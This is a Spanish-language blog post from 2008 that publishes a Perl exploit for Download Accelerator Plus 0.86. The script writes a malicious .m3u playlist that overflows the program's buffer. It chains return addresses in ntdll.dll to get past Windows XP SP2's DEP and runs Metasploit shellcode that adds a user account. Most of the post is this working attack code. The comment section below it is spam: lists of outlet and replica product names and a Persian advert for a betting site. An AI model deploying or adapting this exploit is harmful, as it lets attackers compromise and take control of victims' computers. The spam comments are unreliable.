miércoles, 19 de marzo de 2008

Download Accelerator Plus(DAP), + DEP (Data Execution Prevention)

Ahi os dejo el exploit para que veais como poder desactivar esa proteccion tan maja que trae el windows xp sp2(activada por defecto para pocos procesos como explorer y desactivada para todo lo demas) y el windows 2003(activada para todo por defecto).

Link de descarga del tutorial

PD:Decir que funciona aunque DEP este desactivado tambien

#!/usr/bin/perl
################################################################################
#####################################
#
#
#Exploit por: Trancek
#Email:trancek@yashira.org
#
################################################################################
######################################
use Cwd;

print "Download Accelerator Plus (DAP) 0.86 .m3u Exploit\n\n";


$localhost = "http://localhost/";
$junk = "\x90" x 14115; #Hasta el Ret
$moval1 = "\x80\x20\x96\x7C"; #mov al,1 --> ntdll.dll(xp sp2 spanish)
$padding1 = "\x90" x 4; #NOP
$especialret = "\x94\x11\x91\x7C"; #mov ebp,esp(+codigo hasta ret) --> ntdll.dll(xp sp2 spanish)
$padding2 = "\x90" x 8; #NOP
$ret = "\xED\x1E\x95\x7C"; #jmp esp,win xp sp2(spanish)
$cpmal1 = "\xF8\xD3\x92\x7C"; #cmp al,1 --> ntdll.dll(xp sp2 spanish)
$nopeando = "\x90" x 20; #NOP


# win32_adduser - PASS=test EXITFUNC=seh USER=test Size=489 Encoder=PexAlphaNum http://metasploit.com
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
"\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x44\x4e\x33\x4b\x58\x4e\x57".
"\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x4a\x31\x4b\x58".
"\x4f\x35\x42\x52\x41\x50\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x48".
"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c".
"\x46\x47\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x33\x46\x45\x46\x42\x46\x30\x45\x47\x45\x4e\x4b\x48".
"\x4f\x35\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x58\x4e\x50\x4b\x54".
"\x4b\x58\x4f\x55\x4e\x31\x41\x30\x4b\x4e\x4b\x38\x4e\x41\x4b\x58".
"\x41\x30\x4b\x4e\x49\x48\x4e\x35\x46\x52\x46\x30\x43\x4c\x41\x43".
"\x42\x4c\x46\x46\x4b\x58\x42\x34\x42\x43\x45\x38\x42\x4c\x4a\x47".
"\x4e\x30\x4b\x58\x42\x44\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
"\x4b\x48\x4a\x36\x4a\x50\x4b\x4e\x49\x50\x4b\x48\x42\x48\x42\x4b".
"\x42\x30\x42\x30\x42\x30\x4b\x48\x4a\x36\x4e\x53\x4f\x55\x41\x43".
"\x48\x4f\x42\x36\x48\x45\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x47".
"\x42\x45\x4a\x36\x42\x4f\x4c\x58\x46\x30\x4f\x45\x4a\x36\x4a\x39".
"\x50\x4f\x4c\x38\x50\x30\x47\x55\x4f\x4f\x47\x4e\x43\x56\x4d\x46".
"\x46\x46\x50\x42\x45\x56\x4a\x47\x45\x46\x42\x52\x4f\x52\x43\x36".
"\x42\x32\x50\x46\x45\x46\x46\x57\x42\x52\x45\x47\x43\x37\x45\x36".
"\x44\x37\x42\x32\x46\x37\x45\x36\x43\x47\x46\x37\x42\x42\x46\x37".
"\x45\x36\x43\x37\x46\x37\x42\x52\x4f\x52\x41\x44\x46\x54\x46\x44".
"\x42\x52\x48\x42\x48\x32\x42\x32\x50\x36\x45\x56\x46\x57\x42\x42".
"\x4e\x36\x4f\x36\x43\x56\x41\x36\x4e\x56\x47\x46\x44\x37\x4f\x36".
"\x45\x37\x42\x37\x42\x42\x41\x34\x46\x46\x4d\x56\x49\x56\x50\x46".
"\x49\x56\x43\x57\x46\x37\x44\x37\x41\x56\x46\x47\x4f\x56\x44\x37".
"\x43\x57\x42\x52\x46\x47\x45\x56\x43\x37\x46\x47\x42\x32\x4f\x52".
"\x41\x34\x46\x34\x46\x34\x42\x30\x5a";


open(m3u, ">./vulnerable.m3u");
print m3u "$localhost";
print m3u "$junk";
print m3u "$moval1";
print m3u "$padding1";
print m3u "$especialret";
print m3u "$padding2";
print m3u "$ret";
print m3u "$cpmal1";
print m3u "$nopeando";
print m3u "$shellcode";

print "Instrucciones: El usuario tiene que pulsar el boton verificar. \n";
print "Con este exploit puede saltarse el DEP de Windows XP SP2\n\n";
print "Archivo creado\n";

6 comentarios:

Unknown dijo...

coach outlet online
air max 90
fitflop shoes
eahawks jerseys
yeezy 350 boost
michael kors outlet online
coach factory outlet online
michael kors uk
mlb jerseys
marc jacobs outlet
chenshanshan20170310

Unknown dijo...

tory burch outlet online
pandora outlet
michael kors outlet store
kate spade handbags
ray ban sunglasses sale
nfl jerseys cheap
rolex watches
pandora charms sale clearance
polo ralph lauren outlet
tods outlet
xushengda0518

chenlina dijo...

coach outlet online
tory burch uk
birkenstock outlet
givenchy handbags
coach outlet online
air force 1
swarovski
air jordan
coach
mizuno running shoes
chenlina20180508

Unknown dijo...

lunette ray ban
nike free
replica watches
kobe 10
cheap wedding dresses
nike air max
adidas outlet
nike free run
hermes bags
iphone cases
2018.5.16linying

Unknown dijo...

www1012



coach factory outlet
michael kors outlet
ferragamo shoes
canada goose clothing
fidget spinner
mbt shoes
nike tn
red bottom shoes
salomon shoes
ultra boost 3.0

حضرات بت dijo...

ورود به سایت حضرات بت چگونه می باشد؟

یکی از اولین مورد هایی که می خواهم برای شما مورد بررسی قرار دهیم مربوط به راه های ورود به سایت حضرات بت می باشد. البته هنوز برای این که بگوییم کاملا سایت پویان مختاری را می شناسید و آماده شرط بندی در آن هستید زود می باشد ولی لازم است که در مسیر شناخت بتوانید شخصا تست هایی را پیاده سازی کنید. این تجربه شخصی از موارد ذکر شده بدون شک برای شما شرایطی ایده آل تر را رقم خواهد زد.